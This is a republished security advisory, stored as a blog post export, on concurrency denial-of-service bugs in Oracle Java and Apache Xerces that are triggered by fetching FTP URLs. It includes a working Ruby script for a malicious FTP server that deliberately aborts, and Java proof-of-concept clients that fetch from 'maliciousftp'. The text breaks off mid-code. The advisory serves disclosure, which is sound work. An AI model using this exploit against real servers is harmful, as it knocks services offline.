{"id":9010,"date":"2017-08-30T14:19:11","date_gmt":"2017-08-30T22:19:11","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/08\/30\/news-2783\/"},"modified":"2017-08-30T14:19:11","modified_gmt":"2017-08-30T22:19:11","slug":"news-2783","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/08\/30\/news-2783\/","title":{"rendered":"SSD Advisory \u2013 Oracle Java and Apache Xerces PDF\/Docx Server Side DoS"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 30 Aug 2017 19:11:43 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3271\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3271');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes two (2) vulnerabilities found in Oracle Java JDK\/JRE (1.8.0.131 and previous versions) packages and Apache Xerces (2.11.0)<\/p>\n<p>The vulnerabilities are: <\/p>\n<ul>\n<li>Oracle JDK\/JRE Concurrency-Related Denial of Service<\/li>\n<li>java.net.URLConnection (with no setConnectTimeout) Concurrency-Related Denial of Service<\/li>\n<\/ul>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> Oracle acknowledged receiving the report, and has assigned it a tracking number: S0876966. We have no further information on patch availability or a workaround.<\/p>\n<p><span id=\"more-3271\"><\/span><\/p>\n<p><u><strong>Vulnerabilities Details<\/strong><\/u><br \/> These two vulnerabilities can be triggered to cause a Denial of Service against a server, under the following conditions:<\/p>\n<ul>\n<li>An attacker can pass an URL parameter that points to a controlled FTP server to the target<\/li>\n<li>Target server uses vulnerable component(s) to fetch the resource specified by the attacker<\/li>\n<li>Target server does not prevent fetching of FTP URI resources<\/li>\n<\/ul>\n<p>In both vulnerabilities, the attack sequence is the following:<\/p>\n<ol>\n<li>Attacker forces vulnerable target server to parse an FTP URL which points to an attacker&#8217;s controlled FTP server<\/li>\n<li>Target server fetches FTP resource provided by attacker<\/li>\n<li>Attacker&#8217;s FTP server abruptly exits, leaving the Java process on target server with two internal threads in an infinite waiting status<\/li>\n<li>If the Java process is single-threaded, then it cannot further process any other client requests, reaching a Denial of Service condition with only one request from the attacker <\/li>\n<li>In case of a multi-threading process, then it is possible to use the same technique and reach a Denial of Service condition of all available threads, by issuing one request for each available thread<\/li>\n<\/ol>\n<p>The attacker\u2019s controlled FTP server has to \u201cabruptly\u201d exit when the Java client will perform a RETR FTP command. This behavior is not properly handled and causes a thread concurrency Denial of Service.<\/p>\n<p>For example:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59a739de8f08d809041410\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> require &#8216;socket&#8217;    ftp_server = TCPServer.new 21    Thread.start do  loop do   Thread.start(ftp_server.accept) do |ftp_client|  \tputs &#8220;FTP. New client connected&#8221;  \tftp_client.puts(&#8220;220 ftp-server&#8221;)  \tcounter = 0  \tloop {  \t\treq = ftp_client.gets()  \t\tbreak if req.nil?  \t\tputs &#8220;&lt; &#8220;+req  \t\t  \t\tif req.include? &#8220;USER&#8221;  \t\t\tftp_client.puts(&#8220;331 password&#8221;)  \t\telse  \t\t\tftp_client.puts(&#8220;230 Waiting data&#8221;)  \t\t\tcounter = counter + 1  \t\t\tif counter == 6  \t\t\t\tabort  \t\t\tend  \t\tend  \t}  \tputs &#8220;Aborted&#8230;&#8221;    end  end  end    loop do  \t  sleep(50000)  end<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0024 seconds] -->  <\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-1.jpg\" data-slb-active=\"1\" data-slb-asset=\"673454470\" data-slb-internal=\"0\" data-slb-group=\"3271\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-1-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" class=\"alignnone size-medium wp-image-3272\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-1-300x198.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-1.jpg 306w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>When triggered, the DoS will result in a CLOSE_WAIT status on the connection between the target server and the FTP server (192.168.234.134), leaving the Java process thread stuck.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-2.jpg\" data-slb-active=\"1\" data-slb-asset=\"2016881245\" data-slb-internal=\"0\" data-slb-group=\"3271\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-2-300x11.jpg\" alt=\"\" width=\"300\" height=\"11\" class=\"alignnone size-medium wp-image-3273\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-2-300x11.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-2.jpg 606w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>Oracle JDK\/JRE Concurrency-Related Denial of Service<\/strong><br \/> The vulnerable functions are:<\/p>\n<ul>\n<li>java.io.InputStream<\/li>\n<li>java.xml.ws.Service<\/li>\n<li>javax.xml.validation.Schema<\/li>\n<li>javax.xml.JAXBContext<\/li>\n<li>java.net.JarURLConnection &#8211; The setConnectionTimeout and setReadTimeout are ignored<\/li>\n<li>javax.imageio.ImageIO<\/li>\n<li>Javax.swing.ImageIcon<\/li>\n<li>javax.swing.text.html.StyleSheet<\/li>\n<\/ul>\n<p><strong>java.io.InputStream Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59a739de8f097609467949\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import java.io.InputStream;  import java.net.URL;    public class RandomAccess {   public static void main(String[] args) {    try {     \/\/url = new URL (&#8220;ftp:\/\/maliciousftp:2121\/test.xml&#8221;);     URL url = new URL(&#8220;ftp:\/\/maliciousftp:2121\/test.xml&#8221;);     InputStream inputStream = url.openStream();     inputStream.read();     \/\/urlc.setReadTimeout(5000);     \/\/urlc.setConnectTimeout(5000); \/\/ &lt;- this fixes the bug    } catch (Exception e) {     e.printStackTrace();    }   }  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f097609467949-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f097609467949-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f097609467949-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f097609467949-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f097609467949-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f097609467949-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f097609467949-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f097609467949-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f097609467949-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f097609467949-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f097609467949-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f097609467949-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f097609467949-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f097609467949-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f097609467949-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f097609467949-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f097609467949-17\">17<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59a739de8f097609467949-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">io<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">InputStream<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f097609467949-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f097609467949-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f097609467949-4\"><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">RandomAccess<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f097609467949-5\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f097609467949-6\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f097609467949-7\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/url = new URL (&#8220;ftp:\/\/maliciousftp:2121\/test.xml&#8221;);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f097609467949-8\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-e\">URL <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">URL<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;ftp:\/\/maliciousftp:2121\/test.xml&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f097609467949-9\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-e\">InputStream <\/span><span class=\"crayon-v\">inputStream<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">openStream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f097609467949-10\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">inputStream<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f097609467949-11\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/urlc.setReadTimeout(5000);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f097609467949-12\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/urlc.setConnectTimeout(5000); \/\/ &lt;- this fixes the bug<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f097609467949-13\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">Exception<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f097609467949-14\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f097609467949-15\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f097609467949-16\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f097609467949-17\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0016 seconds] -->  <\/p>\n<p><strong>javax.xml.ws.Service Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59a739de8f09a169914474\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import java.net.MalformedURLException;  import java.net.URL;    import javax.xml.namespace.QName;  import javax.xml.ws.Service;    public class CreateService {   public static void main(String[] args) {    String wsdlURL = &#8220;ftp:\/\/maliciousftp:2121\/test?wsdl&#8221;;    String namespace = &#8220;http:\/\/foo.bar.com\/webservice&#8221;;    String serviceName = &#8220;SomeService&#8221;;    QName serviceQN = new QName(namespace, serviceName);      try {     Service service = Service.create(new URL(wsdlURL), serviceQN);    } catch (MalformedURLException e) {     e.printStackTrace();    }   }    }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09a169914474-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09a169914474-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09a169914474-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09a169914474-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09a169914474-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09a169914474-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09a169914474-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09a169914474-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09a169914474-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09a169914474-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09a169914474-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09a169914474-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09a169914474-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09a169914474-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09a169914474-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09a169914474-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09a169914474-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09a169914474-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09a169914474-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09a169914474-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09a169914474-21\">21<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09a169914474-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">MalformedURLException<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09a169914474-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09a169914474-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09a169914474-4\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">javax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-t\">namespace<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">QName<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09a169914474-5\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">javax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ws<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">Service<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09a169914474-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09a169914474-7\"><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">CreateService<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09a169914474-8\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09a169914474-9\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">wsdlURL<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;ftp:\/\/maliciousftp:2121\/test?wsdl&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09a169914474-10\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">namespace<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;http:\/\/foo.bar.com\/webservice&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09a169914474-11\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">serviceName<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;SomeService&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09a169914474-12\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">QName <\/span><span class=\"crayon-v\">serviceQN<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">QName<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">namespace<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">serviceName<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09a169914474-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09a169914474-14\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09a169914474-15\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-e\">Service <\/span><span class=\"crayon-v\">service<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Service<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">create<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">URL<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">wsdlURL<\/span><span class=\"crayon-sy\">)<\/span><span 